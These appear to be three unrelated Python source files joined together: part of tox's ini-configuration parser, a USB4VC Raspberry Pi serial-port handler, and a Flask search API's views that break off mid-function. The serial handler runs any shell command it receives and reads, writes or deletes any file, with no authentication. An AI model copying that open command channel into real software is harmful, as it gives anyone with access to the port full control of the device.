parser.add_testenv_attribute(
"extras",
type="line-list",
help="list of extras to install with the source distribution or develop install",
)
add_parallel_config(parser)
def cli_skip_missing_interpreter(parser):
class SkipMissingInterpreterAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
value = "true" if values is None else values
if value not in ("config", "true", "false"):
raise argparse.ArgumentTypeError("value must be config, true or false")
setattr(namespace, self.dest, value)
parser.add_argument(
"-s",
"--skip-missing-interpreters",
default="config",
metavar="val",
nargs="?",
action=SkipMissingInterpreterAction,
help="don't fail tests for missing interpreters: {config,true,false} choice",
)
class Config(object):
"""Global Tox config object."""
def __init__(self, pluginmanager, option, interpreters, parser, args):
self.envconfigs = OrderedDict()
"""Mapping envname -> envconfig"""
self.invocationcwd = py.path.local()
self.interpreters = interpreters
self.pluginmanager = pluginmanager
self.option = option
self._parser = parser
self._testenv_attr = parser._testenv_attr
self.args = args
"""option namespace containing all parsed command line options"""
@property
def homedir(self):
homedir = get_homedir()
if homedir is None:
homedir = self.toxinidir # FIXME XXX good idea?
return homedir
class TestenvConfig:
"""Testenv Configuration object.
In addition to some core attributes/properties this config object holds all
per-testenv ini attributes as attributes, see "tox --help-ini" for an overview.
"""
def __init__(self, envname, config, factors, reader):
#: test environment name
self.envname = envname
#: global tox config object
self.config = config
#: set of factors
self.factors = factors
self._reader = reader
self._missing_subs = []
"""Holds substitutions that could not be resolved.
Pre 2.8.1 missing substitutions crashed with a ConfigError although this would not be a
problem if the env is not part of the current testrun. So we need to remember this and
check later when the testenv is actually run and crash only then.
"""
def get_envbindir(self):
"""Path to directory where scripts/binaries reside."""
is_bin = (
isinstance(self.python_info, NoInterpreterInfo)
or tox.INFO.IS_WIN is False
or self.python_info.implementation == "Jython"
or (
tox.INFO.IS_WIN
and self.python_info.implementation == "PyPy"
and self.python_info.extra_version_info < (7, 3, 1)
)
)
return self.envdir.join("bin" if is_bin else "Scripts")
@property
def envbindir(self):
return self.get_envbindir()
@property
def envpython(self):
"""Path to python executable."""
return self.get_envpython()
def get_envpython(self):
""" path to python/jython executable. """
if "jython" in str(self.basepython):
name = "jython"
else:
name = "python"
return self.envbindir.join(name)
def get_envsitepackagesdir(self):
"""Return sitepackagesdir of the virtualenv environment.
NOTE: Only available during execution, not during parsing.
"""
x = self.config.interpreters.get_sitepackagesdir(info=self.python_info, envdir=self.envdir)
return x
@property
def python_info(self):
"""Return sitepackagesdir of the virtualenv environment."""
return self.config.interpreters.get_info(envconfig=self)
def getsupportedinterpreter(self):
if tox.INFO.IS_WIN and self.basepython and "jython" in self.basepython:
raise tox.exception.UnsupportedInterpreter(
"Jython/Windows does not support installing scripts",
)
info = self.config.interpreters.get_info(envconfig=self)
if not info.executable:
raise tox.exception.InterpreterNotFound(self.basepython)
if not info.version_info:
raise tox.exception.InvocationError(
"Failed to get version_info for {}: {}".format(info.name, info.err),
)
return info.executable
testenvprefix = "testenv:"
def get_homedir():
try:
return py.path.local._gethomedir()
except Exception:
return None
def make_hashseed():
max_seed = 4294967295
if tox.INFO.IS_WIN:
max_seed = 1024
return str(random.randint(1, max_seed))
class SkipThisIni(Exception):
"""Internal exception to indicate the parsed ini file should be skipped"""
class ParseIni(object):
def __init__(self, config, ini_path, ini_data): # noqa
config.toxinipath = ini_path
using("tox.ini: {} (pid {})".format(config.toxinipath, os.getpid()))
config.toxinidir = config.toxinipath.dirpath() if ini_path.check(file=True) else ini_path
self._cfg = py.iniconfig.IniConfig(config.toxinipath, ini_data)
if ini_path.basename == "setup.cfg" and "tox:tox" not in self._cfg:
verbosity1("Found no [tox:tox] section in setup.cfg, skipping.")
raise SkipThisIni()
previous_line_of = self._cfg.lineof
self.expand_section_names(self._cfg)
def line_of_default_to_zero(section, name=None):
at = previous_line_of(section, name=name)
if at is None:
at = 0
return at
self._cfg.lineof = line_of_default_to_zero
config._cfg = self._cfg
self.config = config
prefix = "tox" if ini_path.basename == "setup.cfg" else None
fallbacksection = "tox:tox" if ini_path.basename == "setup.cfg" else "tox"
context_name = getcontextname()
if context_name == "jenkins":
reader = SectionReader(
"tox:jenkins", self._cfg, prefix=prefix, fallbacksections=[fallbacksection],
)
dist_share_default = "{toxworkdir}/distshare"
elif not context_name:
reader = SectionReader("tox", self._cfg, prefix=prefix)
dist_share_default = "{homedir}/.tox/distshare"
else:
raise ValueError("invalid context")
if config.option.hashseed is None:
hash_seed = make_hashseed()
elif config.option.hashseed == "noset":
hash_seed = None
else:
hash_seed = config.option.hashseed
config.hashseed = hash_seed
reader.addsubstitutions(toxinidir=config.toxinidir, homedir=config.homedir)
if config.option.workdir is None:
config.toxworkdir = reader.getpath("toxworkdir", "{toxinidir}/.tox")
else:
config.toxworkdir = config.toxinidir.join(config.option.workdir, abs=True)
if os.path.exists(str(config.toxworkdir)):
config.toxworkdir = config.toxworkdir.realpath()
reader.addsubstitutions(toxworkdir=config.toxworkdir)
config.ignore_basepython_conflict = reader.getbool("ignore_basepython_conflict", False)
config.distdir = reader.getpath("distdir", "{toxworkdir}/dist")
reader.addsubstitutions(distdir=config.distdir)
config.distshare = reader.getpath("distshare", dist_share_default)
reader.addsubstitutions(distshare=config.distshare)
config.temp_dir = reader.getpath("temp_dir", "{toxworkdir}/.tmp")
reader.addsubstitutions(temp_dir=config.temp_dir)
config.sdistsrc = reader.getpath("sdistsrc", None)
config.setupdir = reader.getpath("setupdir", "{toxinidir}")
config.logdir = config.toxworkdir.join("log")
within_parallel = PARALLEL_ENV_VAR_KEY_PRIVATE in os.environ
if not within_parallel and not WITHIN_PROVISION:
ensure_empty_dir(config.logdir)
# determine indexserver dictionary
config.indexserver = {"default": IndexServerConfig("default")}
prefix = "indexserver"
for line in reader.getlist(prefix):
name, url = map(lambda x: x.strip(), line.split("=", 1))
config.indexserver[name] = IndexServerConfig(name, url)
if config.option.skip_missing_interpreters == "config":
val = reader.getbool("skip_missing_interpreters", False)
config.option.skip_missing_interpreters = "true" if val else "false"
override = False
if config.option.indexurl:
for url_def in config.option.indexurl:
m = re.match(r"\W*(\w+)=(\S+)", url_def)
if m is None:
url = url_def
name = "default"
else:
name, url = m.groups()
if not url:
url = None
if name != "ALL":
config.indexserver[name].url = url
else:
override = url
# let ALL override all existing entries
if override:
for name in config.indexserver:
config.indexserver[name] = IndexServerConfig(name, override)
self.handle_provision(config, reader)
self.parse_build_isolation(config, reader)
res = self._getenvdata(reader, config)
config.envlist, all_envs, config.envlist_default, config.envlist_explicit = res
# factors used in config or predefined
known_factors = self._list_section_factors("testenv")
known_factors.update({"py", "python"})
# factors stated in config envlist
stated_envlist = reader.getstring("envlist", replace=False)
if stated_envlist:
for env in _split_env(stated_envlist):
known_factors.update(env.split("-"))
# configure testenvs
to_do = []
failures = OrderedDict()
results = {}
cur_self = self
def run(name, section, subs, config):
try:
results[name] = cur_self.make_envconfig(name, section, subs, config)
except Exception as exception:
failures[name] = (exception, traceback.format_exc())
order = []
for name in all_envs:
section = "{}{}".format(testenvprefix, name)
factors = set(name.split("-"))
if (
section in self._cfg
or factors <= known_factors
or all(
tox.PYTHON.PY_FACTORS_RE.match(factor) for factor in factors - known_factors
)
):
order.append(name)
thread = Thread(target=run, args=(name, section, reader._subs, config))
thread.daemon = True
thread.start()
to_do.append(thread)
for thread in to_do:
while thread.is_alive():
thread.join(timeout=20)
if failures:
raise tox.exception.ConfigError(
"\n".join(
"{} failed with {} at {}".format(key, exc, trace)
for key, (exc, trace) in failures.items()
),
)
for name in order:
config.envconfigs[name] = results[name]
all_develop = all(
name in config.envconfigs and config.envconfigs[name].usedevelop
for name in config.envlist
)
config.skipsdist = reader.getbool("skipsdist", all_develop)
if config.option.devenv is not None:
config.option.notest = True
if config.option.devenv is not None and len(config.envlist) != 1:
feedback("--devenv requires only a single -e", sysexit=True)
def handle_provision(self, config, reader):
requires_list = reader.getlist("requires")
config.minversion = reader.getstring("minversion", None)
config.provision_tox_env = name = reader.getstring("provision_tox_env", ".tox")
min_version = "tox >= {}".format(config.minversion or tox.__version__)
deps = self.ensure_requires_satisfied(config, requires_list, min_version)
if config.run_provision:
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["description"] = "meta tox"
env_config = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config,
)
env_config.deps = deps
config.envconfigs[config.provision_tox_env] = env_config
raise tox.exception.MissingRequirement(config)
# if provisioning is not on, now we need do a strict argument evaluation
# raise on unknown args
self.config._parser.parse_cli(args=self.config.args, strict=True)
@staticmethod
def ensure_requires_satisfied(config, requires, min_version):
missing_requirements = []
failed_to_parse = False
deps = []
exists = set()
for require in requires + [min_version]:
# noinspection PyBroadException
try:
package = requirements.Requirement(require)
# check if the package even applies
if package.marker and not package.marker.evaluate({"extra": ""}):
continue
package_name = canonicalize_name(package.name)
if package_name not in exists:
deps.append(DepConfig(require, None))
exists.add(package_name)
dist = importlib_metadata.distribution(package.name)
if not package.specifier.contains(dist.version, prereleases=True):
raise MissingDependency(package)
except requirements.InvalidRequirement as exception:
failed_to_parse = True
error("failed to parse {!r}".format(exception))
except Exception as exception:
verbosity1("could not satisfy requires {!r}".format(exception))
missing_requirements.append(str(requirements.Requirement(require)))
if failed_to_parse:
raise tox.exception.BadRequirement()
if WITHIN_PROVISION and missing_requirements:
msg = "break infinite loop provisioning within {} missing {}"
raise tox.exception.Error(msg.format(sys.executable, missing_requirements))
config.run_provision = bool(len(missing_requirements))
return deps
def parse_build_isolation(self, config, reader):
config.isolated_build = reader.getbool("isolated_build", False)
config.isolated_build_env = reader.getstring("isolated_build_env", ".package")
if config.isolated_build is True:
name = config.isolated_build_env
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["deps"] = ""
self._cfg.sections[section_name]["sitepackages"] = "False"
self._cfg.sections[section_name]["description"] = "isolated packaging environment"
config.envconfigs[name] = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config,
)
def _list_section_factors(self, section):
factors = set()
if section in self._cfg:
for _, value in self._cfg[section].items():
exprs = re.findall(r"^([\w{}\.!,-]+)\:\s+", value, re.M)
factors.update(*mapcat(_split_factor_expr_all, exprs))
return factors
def make_envconfig(self, name, section, subs, config, replace=True):
factors = set(name.split("-"))
reader = SectionReader(section, self._cfg, fallbacksections=["testenv"], factors=factors)
tc = TestenvConfig(name, config, factors, reader)
reader.addsubstitutions(
envname=name,
envbindir=tc.get_envbindir,
envsitepackagesdir=tc.get_envsitepackagesdir,
envpython=tc.get_envpython,
**subs
)
for env_attr in config._testenv_attr:
atype = env_attr.type
try:
if atype in (
"bool",
"float",
"path",
"string",
"dict",
"dict_setenv",
"argv",
"argvlist",
):
meth = getattr(reader, "get{}".format(atype))
res = meth(env_attr.name, env_attr.default, replace=replace)
elif atype == "basepython":
no_fallback = name in (config.provision_tox_env,)
res = reader.getstring(
env_attr.name, env_attr.default, replace=replace, no_fallback=no_fallback,
)
elif atype == "space-separated-list":
res = reader.getlist(env_attr.name, sep=" ")
elif atype == "line-list":
res = reader.getlist(env_attr.name, sep="\n")
elif atype == "env-list":
res = reader.getstring(env_attr.name, replace=False)
res = tuple(_split_env(res))
else:
raise ValueError("unknown type {!r}".format(atype))
if env_attr.postprocess:
res = env_attr.postprocess(testenv_config=tc, value=res)
except tox.exception.MissingSubstitution as e:
tc._missing_subs.append(e.name)
res = e.FLAG
setattr(tc, env_attr.name, res)
if atype in ("path", "string", "basepython"):
reader.addsubstitutions(**{env_attr.name: res})
return tc
def _getallenvs(self, reader, extra_env_list=None):
extra_env_list = extra_env_list or []
env_str = reader.getstring("envlist", replace=False)
env_list = _split_env(env_str)
for env in extra_env_list:
if env not in env_list:
env_list.append(env)
all_envs = OrderedDict((i, None) for i in env_list)
for section in self._cfg:
if section.name.startswith(testenvprefix):
all_envs[section.name[len(testenvprefix) :]] = None
if not all_envs:
all_envs["python"] = None
return list(all_envs.keys())
def _getenvdata(self, reader, config):
from_option = self.config.option.env
from_environ = os.environ.get("TOXENV")
from_config = reader.getstring("envlist", replace=False)
env_list = []
envlist_explicit = False
if (from_option and "ALL" in from_option) or (
not from_option and from_environ and "ALL" in from_environ.split(",")
):
all_envs = self._getallenvs(reader)
else:
candidates = (
(os.environ.get(PARALLEL_ENV_VAR_KEY_PRIVATE), True),
(from_option, True),
(from_environ, True),
("py" if self.config.option.devenv is not None else None, False),
(from_config, False),
)
env_str, envlist_explicit = next(((i, e) for i, e in candidates if i), ([], False))
env_list = _split_env(env_str)
all_envs = self._getallenvs(reader, env_list)
if not env_list:
env_list = all_envs
package_env = config.isolated_build_env
if config.isolated_build is True and package_env in all_envs:
all_envs.remove(package_env)
if config.isolated_build is True and package_env in env_list:
msg = "isolated_build_env {} cannot be part of envlist".format(package_env)
raise tox.exception.ConfigError(msg)
return env_list, all_envs, _split_env(from_config), envlist_explicit
@staticmethod
def expand_section_names(config):
"""Generative section names.
Allow writing section as [testenv:py{36,37}-cov]
The parser will see it as two different sections: [testenv:py36-cov], [testenv:py37-cov]
"""
factor_re = re.compile(r"\{\s*([\w\s,-]+)\s*\}")
split_re = re.compile(r"\s*,\s*")
to_remove = set()
for section in list(config.sections):
split_section = factor_re.split(section)
for parts in itertools.product(*map(split_re.split, split_section)):
section_name = "".join(parts)
if section_name not in config.sections:
config.sections[section_name] = config.sections[section]
to_remove.add(section)
for section in to_remove:
del config.sections[section]
def _split_env(env):
"""if handed a list, action="append" was used for -e """
if env is None:
return []
if not isinstance(env, list):
env = [e.split("#", 1)[0].strip() for e in env.split("\n")]
env = ",".join([e for e in env if e])
env = [env]
return mapcat(_expand_envstr, env)
def _is_negated_factor(factor):
return factor.startswith("!")
def _base_factor_name(factor):
return factor[1:] if _is_negated_factor(factor) else factor
def _split_factor_expr(expr):
def split_single(e):
raw = e.split("-")
included = {_base_factor_name(factor) for factor in raw if not _is_negated_factor(factor)}
excluded = {_base_factor_name(factor) for factor in raw if _is_negated_factor(factor)}
return included, excluded
partial_envs = _expand_envstr(expr)
return [split_single(e) for e in partial_envs]
def _split_factor_expr_all(expr):
partial_envs = _expand_envstr(expr)
return [{_base_factor_name(factor) for factor in e.split("-")} for e in partial_envs]
def _expand_envstr(envstr):
# split by commas not in groups
tokens = _ENVSTR_SPLIT_PATTERN.split(envstr)
envlist = ["".join(g).strip() for k, g in itertools.groupby(tokens, key=bool) if k]
def expand(env):
tokens = _ENVSTR_EXPAND_PATTERN.split(env)
parts = [_WHITESPACE_PATTERN.sub("", token).split(",") for token in tokens]
return ["".join(variant) for variant in itertools.product(*parts)]
return mapcat(expand, envlist)
def mapcat(f, seq):
return list(itertools.chain.from_iterable(map(f, seq)))
class DepConfig:
def __init__(self, name, indexserver=None):
self.name = name
self.indexserver = indexserver
def __repr__(self):
if self.indexserver:
if self.indexserver.name == "default":
return self.name
return ":{}:{}".format(self.indexserver.name, self.name)
return str(self.name)
class IndexServerConfig:
def __init__(self, name, url=None):
self.name = name
self.url = url
def __repr__(self):
return "IndexServerConfig(name={}, url={})".format(self.name, self.url)
is_section_substitution = re.compile(r"{\[[^{}\s]+\]\S+?}").match
# Check value matches substitution form of referencing value from other section.
# E.g. {[base]commands}
class SectionReader:
def __init__(self, section_name, cfgparser, fallbacksections=None, factors=(), prefix=None):
if prefix is None:
self.section_name = section_name
else:
self.section_name = "{}:{}".format(prefix, section_name)
self._cfg = cfgparser
self.fallbacksections = fallbacksections or []
self.factors = factors
self._subs = {}
self._subststack = []
self._setenv = None
def get_environ_value(self, name):
if self._setenv is None:
return os.environ.get(name)
return self._setenv.get(name)
def addsubstitutions(self, _posargs=None, **kw):
self._subs.update(kw)
if _posargs:
self.posargs = _posargs
def getpath(self, name, defaultpath, replace=True):
path = self.getstring(name, defaultpath, replace=replace)
if path is not None:
toxinidir = self._subs["toxinidir"]
return toxinidir.join(path, abs=True)
def getlist(self, name, sep="\n"):
s = self.getstring(name, None)
if s is None:
return []
return [x.strip() for x in s.split(sep) if x.strip()]
def getdict(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace)
return self._getdict(value, default=default, sep=sep, replace=replace)
def getdict_setenv(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace, crossonly=True)
definitions = self._getdict(value, default=default, sep=sep, replace=replace)
self._setenv = SetenvDict(definitions, reader=self)
return self._setenv
def _getdict(self, value, default, sep, replace=True):
if value is None or not replace:
return default or {}
d = {}
for line in value.split(sep):
if line.strip():
name, rest = line.split("=", 1)
d[name.strip()] = rest.strip()
return d
def getfloat(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, float):
try:
s = float(s)
except ValueError:
raise tox.exception.ConfigError("{}: invalid float {!r}".format(name, s))
return s
def getbool(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, bool):
if s.lower() == "true":
s = True
elif s.lower() == "false":
s = False
else:
raise tox.exception.ConfigError(
"{}: boolean value {!r} needs to be 'True' or 'False'".format(name, s),
)
return s
def getargvlist(self, name, default="", replace=True):
s = self.getstring(name, default, replace=False)
return _ArgvlistReader.getargvlist(self, s, replace=replace)
def getargv(self, name, default="", replace=True):
return self.getargvlist(name, default, replace=replace)[0]
def getstring(self, name, default=None, replace=True, crossonly=False, no_fallback=False):
x = None
sections = [self.section_name] + ([] if no_fallback else self.fallbacksections)
for s in sections:
try:
x = self._cfg[s][name]
break
except KeyError:
continue
if x is None:
x = default
else:
# It is needed to apply factors before unwrapping
# dependencies, otherwise it can break the substitution
# process. Once they are unwrapped, we call apply factors
# again for those new dependencies.
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
return x
def _replace_if_needed(self, x, name, replace, crossonly):
if replace and x and hasattr(x, "replace"):
x = self._replace(x, name=name, crossonly=crossonly)
return x
def _apply_factors(self, s):
def factor_line(line):
m = _FACTOR_LINE_PATTERN.search(line)
if not m:
return line
expr, line = m.groups()
if any(
included <= self.factors and not any(x in self.factors for x in excluded)
for included, excluded in _split_factor_expr(expr)
):
return line
lines = s.strip().splitlines()
return "\n".join(filter(None, map(factor_line, lines)))
def _replace(self, value, name=None, section_name=None, crossonly=False):
if "{" not in value:
return value
section_name = section_name if section_name else self.section_name
self._subststack.append((section_name, name))
try:
replaced = Replacer(self, crossonly=crossonly).do_replace(value)
assert self._subststack.pop() == (section_name, name)
except tox.exception.MissingSubstitution:
if not section_name.startswith(testenvprefix):
raise tox.exception.ConfigError(
"substitution env:{!r}: unknown or recursive definition in"
" section {!r}.".format(value, section_name),
)
raise
return replaced
class Replacer:
RE_ITEM_REF = re.compile(
r"""
(?<!\\)[{]
(?:(?P<sub_type>[^[:{}]+):)? # optional sub_type for special rules
(?P<substitution_value>(?:\[[^,{}]*\])?[^:,{}]*) # substitution key
(?::(?P<default_value>[^{}]*))? # default value
[}]
""",
re.VERBOSE,
)
def __init__(self, reader, crossonly=False):
self.reader = reader
self.crossonly = crossonly
def do_replace(self, value):
"""
Recursively expand substitutions starting from the innermost expression
"""
def substitute_once(x):
return self.RE_ITEM_REF.sub(self._replace_match, x)
expanded = substitute_once(value)
while expanded != value: # substitution found
value = expanded
expanded = substitute_once(value)
return expanded
def _replace_match(self, match):
g = match.groupdict()
sub_value = g["substitution_value"]
if self.crossonly:
if sub_value.startswith("["):
return self._substitute_from_other_section(sub_value)
# in crossonly we return all other hits verbatim
start, end = match.span()
return match.string[start:end]
# special case: all empty values means ":" which is os.pathsep
if not any(g.values()):
return os.pathsep
# special case: opts and packages. Leave {opts} and
# {packages} intact, they are replaced manually in
# _venv.VirtualEnv.run_install_command.
if sub_value in ("opts", "packages"):
return "{{{}}}".format(sub_value)
try:
sub_type = g["sub_type"]
except KeyError:
raise tox.exception.ConfigError(
"Malformed substitution; no substitution type provided",
)
if sub_type == "env":
return self._replace_env(match)
if sub_type == "tty":
if is_interactive():
return match.group("substitution_value")
return match.group("default_value")
if sub_type is not None:
raise tox.exception.ConfigError(
"No support for the {} substitution type".format(sub_type),
)
return self._replace_substitution(match)
def _replace_env(self, match):
key = match.group("substitution_value")
if not key:
raise tox.exception.ConfigError("env: requires an environment variable name")
default = match.group("default_value")
value = self.reader.get_environ_value(key)
if value is not None:
return value
if default is not None:
return default
raise tox.exception.MissingSubstitution(key)
def _substitute_from_other_section(self, key):
if key.startswith("[") and "]" in key:
i = key.find("]")
section, item = key[1:i], key[i + 1 :]
cfg = self.reader._cfg
if section in cfg and item in cfg[section]:
if (section, item) in self.reader._subststack:
raise ValueError(
"{} already in {}".format((section, item), self.reader._subststack),
)
x = str(cfg[section][item])
return self.reader._replace(
x, name=item, section_name=section, crossonly=self.crossonly,
)
raise tox.exception.ConfigError("substitution key {!r} not found".format(key))
def _replace_substitution(self, match):
sub_key = match.group("substitution_value")
val = self.reader._subs.get(sub_key, None)
if val is None:
val = self._substitute_from_other_section(sub_key)
if callable(val):
val = val()
return str(val)
def is_interactive():
return sys.stdin.isatty()
class _ArgvlistReader:
@classmethod
def getargvlist(cls, reader, value, replace=True):
"""Parse ``commands`` argvlist multiline string.
:param SectionReader reader: reader to be used.
:param str value: Content stored by key.
:rtype: list[list[str]]
:raise :class:`tox.exception.ConfigError`:
line-continuation ends nowhere while resolving for specified section
"""
commands = []
current_command = ""
for line in value.splitlines():
line = line.rstrip()
if not line:
continue
if line.endswith("\\"):
current_command += " {}".format(line[:-1])
continue
current_command += line
if is_section_substitution(current_command):
replaced = reader._replace(current_command, crossonly=True)
commands.extend(cls.getargvlist(reader, replaced))
else:
commands.append(cls.processcommand(reader, current_command, replace))
current_command = ""
else:
if current_command:
raise tox.exception.ConfigError(
"line-continuation ends nowhere while resolving for [{}] {}".format(
reader.section_name, "commands",
),
)
return commands
@classmethod
def processcommand(cls, reader, command, replace=True):
posargs = getattr(reader, "posargs", "")
if sys.platform.startswith("win"):
posargs_string = list2cmdline([x for x in posargs if x])
else:
posargs_string = " ".join([shlex_quote(x) for x in posargs if x])
# Iterate through each word of the command substituting as
# appropriate to construct the new command string. This
# string is then broken up into exec argv components using
# shlex.
if replace:
newcommand = ""
for word in CommandParser(command).words():
if word == "{posargs}" or word == "[]":
newcommand += posargs_string
continue
elif word.startswith("{posargs:") and word.endswith("}"):
if posargs:
newcommand += posargs_string
continue
else:
word = word[9:-1]
new_arg = ""
new_word = reader._replace(word)
new_word = reader._replace(new_word)
new_word = new_word.replace("\\{", "{").replace("\\}", "}")
new_arg += new_word
newcommand += new_arg
else:
newcommand = command
# Construct shlex object that will not escape any values,
# use all values as is in argv.
shlexer = shlex.shlex(newcommand, posix=True)
shlexer.whitespace_split = True
shlexer.escape = ""
return list(shlexer)
class CommandParser(object):
class State(object):
def __init__(self):
self.word = ""
self.depth = 0
self.yield_words = []
def __init__(self, command):
self.command = command
def words(self):
ps = CommandParser.State()
def word_has_ended():
return (
(
cur_char in string.whitespace
and ps.word
and ps.word[-1] not in string.whitespace
)
or (cur_char == "{" and ps.depth == 0 and not ps.word.endswith("\\"))
or (ps.depth == 0 and ps.word and ps.word[-1] == "}")
or (cur_char not in string.whitespace and ps.word and ps.word.strip() == "")
)
def yield_this_word():
yieldword = ps.word
ps.word = ""
if yieldword:
ps.yield_words.append(yieldword)
def yield_if_word_ended():
if word_has_ended():
yield_this_word()
def accumulate():
ps.word += cur_char
def push_substitution():
ps.depth += 1
def pop_substitution():
ps.depth -= 1
for cur_char in self.command:
if cur_char in string.whitespace:
if ps.depth == 0:
yield_if_word_ended()
accumulate()
elif cur_char == "{":
yield_if_word_ended()
accumulate()
push_substitution()
elif cur_char == "}":
accumulate()
pop_substitution()
else:
yield_if_word_ended()
accumulate()
if ps.word.strip():
yield_this_word()
return ps.yield_words
def getcontextname():
if any(env in os.environ for env in ["JENKINS_URL", "HUDSON_URL"]):
return "jenkins"
return None
|
usb4vc_uart.py
|
import os
import sys
import time
import serial
import subprocess
import base64
import threading
import usb4vc_shared
# import usb4vc_usb_scan
# import usb4vc_ui
ser = None
try:
ser = serial.Serial('/dev/serial0', 115200)
except Exception as e:
print("SERIAL OPEN EXCEPTION:", e)
def uart_worker():
if ser is None:
return
while 1:
received = ser.readline().decode().replace('\r', '').replace('\n', '')
# print("I received:", received)
line_split = received.split(' ', maxsplit=2)
if len(line_split) < 2:
continue
magic = line_split[0]
cmd_type = line_split[1]
payload = line_split[-1]
if magic != 'U4':
continue
if cmd_type == "QUIT":
exit()
# read file
if cmd_type == 'RF':
file_path = line_split[-1].strip()
content = None
try:
with open(file_path, 'rb') as myfile:
content = myfile.read()
except Exception as e:
ser.write(f"U4 ERR {e}\n".encode('utf-8'))
continue
base64_bytes = base64.standard_b64encode(content)
base64_message = base64_bytes.decode('utf-8')
ser.write(f"U4 OK {base64_message}\n".encode('utf-8'))
# write file
if cmd_type == 'WF':
wf_args = payload.split(' ', maxsplit=2)
if len(wf_args) < 2:
ser.write("U4 ERR missing file content\n".encode('utf-8'))
continue
file_path = wf_args[0].strip()
base64_message = wf_args[1].strip()
try:
base64_bytes = base64.standard_b64decode(base64_message)
with open(file_path, 'wb') as myfile:
myfile.write(base64_bytes)
ser.write("U4 OK\n".encode('utf-8'))
except Exception as e:
ser.write(f"U4 ERR {e}\n".encode('utf-8'))
continue
# delete file
if cmd_type == 'DF':
file_path = line_split[-1].strip()
try:
os.remove(file_path)
except Exception as e:
ser.write(f"U4 ERR {e}\n".encode('utf-8'))
continue
ser.write("U4 OK\n".encode('utf-8'))
if cmd_type == 'SC':
try:
shell_result = subprocess.getoutput(payload).strip()
base64_bytes = base64.standard_b64encode(shell_result.encode('utf-8'))
base64_message = base64_bytes.decode('utf-8')
ser.write(f"U4 OK {base64_message}\n".encode('utf-8'))
except Exception as e:
ser.write(f"U4 ERR {e}\n".encode('utf-8'))
continue
if cmd_type == 'INFO':
try:
ser.write(f"U4 OK USB4VC RPi App v{usb4vc_shared.RPI_APP_VERSION_TUPLE[0]}.{usb4vc_shared.RPI_APP_VERSION_TUPLE[1]}.{usb4vc_shared.RPI_APP_VERSION_TUPLE[2]} dekuNukem 2022\n".encode('utf-8'))
except Exception as e:
ser.write(f"U4 ERR {e}\n".encode('utf-8'))
continue
uart_thread = threading.Thread(target=uart_worker, daemon=True)
|
views.py
|
from flask import request
from flask_cors import CORS, cross_origin
from datetime import datetime, timezone
from functools import wraps
import threading, json, time
from googletrans import Translator
from AuthModule.authhandler import authProvider
from SearchModule import app
from SearchModule.TextSearchModule import loadModel, refreshModel, freeModel, loaded_models
from SearchModule.Utilities import resourceConfig, getProductId, getAllProductIds
from SearchModule.StorageAccountHelper import StorageAccountHelper
from SearchModule.Logger import loggerInstance
from SearchModule.LuisProvider import getLuisPredictions, mergeLuisResults
import urllib.parse, re
translator = Translator()
specialChars = r'[^(0-9a-zA-Z )]+'
######## RUN THE API SERVER IN FLASK #############
def getUTCTime():
return datetime.now(timezone.utc)
def getLatency(startTime, endTime):
return (endTime-startTime).total_seconds()*1000
def getRequestId(req):
if req.method == 'POST':
data = json.loads(request.data.decode('utf-8'))
return data['requestId'] if 'requestId' in data else None
elif req.method == 'GET':
return request.args.get('requestId')
return None
def loggingProvider(requestIdRequired=True):
def loggingOuter(f):
@wraps(f)
def logger(*args, **kwargs):
startTime = getUTCTime()
res = None
try:
requestId = getRequestId(request)
except Exception as e:
exceptionMessage = "Failed to parse request to get requestId: {0}".format(str(e))
loggerInstance.logUnhandledException("ErrorRequestId", exceptionMessage)
return (exceptionMessage, 500)
requestId = requestId if requestId else (str(uuid.uuid4()) if not requestIdRequired else None)
if not requestId:
res = ("BadRequest: Missing parameter requestId", 400)
endTime = getUTCTime()
loggerInstance.logApiSummary("Null", str(request.url_rule), res[1], getLatency(startTime, endTime), startTime.strftime("%H:%M:%S.%f"), endTime.strftime("%H:%M:%S.%f"), res[0])
return res
else:
try:
res = f(*args, **kwargs)
except Exception as e:
res = (str(e), 500)
loggerInstance.logUnhandledException(requestId, str(e))
endTime = getUTCTime()
if res:
loggerInstance.logApiSummary(requestId, str(request.url_rule), res[1], getLatency(startTime, endTime), startTime.strftime("%H:%M:%S.%f"), endTime.strftime("%H:%M:%S.%f"), res[0])
return res
return logger
return loggingOuter
# App routes
cors = CORS(app)
app.config.from_object("AppConfig.ProductionConfig")
app.config['CORS_HEADERS'] = 'Content-Type'
@app.before_first_request
def activate_job():
if app.config['MODEL_SYNC_ENABLED']:
productIds = getAllProductIds(resourceConfig)
sah = StorageAccountHelper(loggerInstance)
loggerInstance.logInsights("Starting model sync for {0}".format(','.join(productIds)))
thread = threading.Thread(target=sah.watchModels, args=(productIds,))
thread.start()
while True:
modelDownloadPending = [sah.firstTime[productId] if productId in sah.firstTime else True for productId in productIds]
if any(modelDownloadPending):
time.sleep(2)
else:
break
loggerInstance.logInsights("Search service startup succeeded")
@app.route('/healthping')
@cross_origin()
def healthPing():
return ("I am alive!", 200)
@app.route('/queryDetectors', methods=["POST"])
@cross_origin()
@authProvider()
@loggingProvider(requestIdRequired=True)
def queryDetectorsMethod():
data = json.loads(request.data.decode('utf-8'))
requestId = data['requestId']
try:
txt_data = translator.translate(urllib.parse.unquote(data['text'])).text
except Exception as e:
if 'text' in data:
loggerInstance.logHandledException(requestId, Exception(f"Failed to translate the query -> {str(e)}. Querystring: {data['text']}"))
txt_data = urllib.parse.unquote(data['text'])
else:
return ("Parameter with name 'text' was not provided in the request", 400)
original_query = txt_data
if (len(original_query)>250):
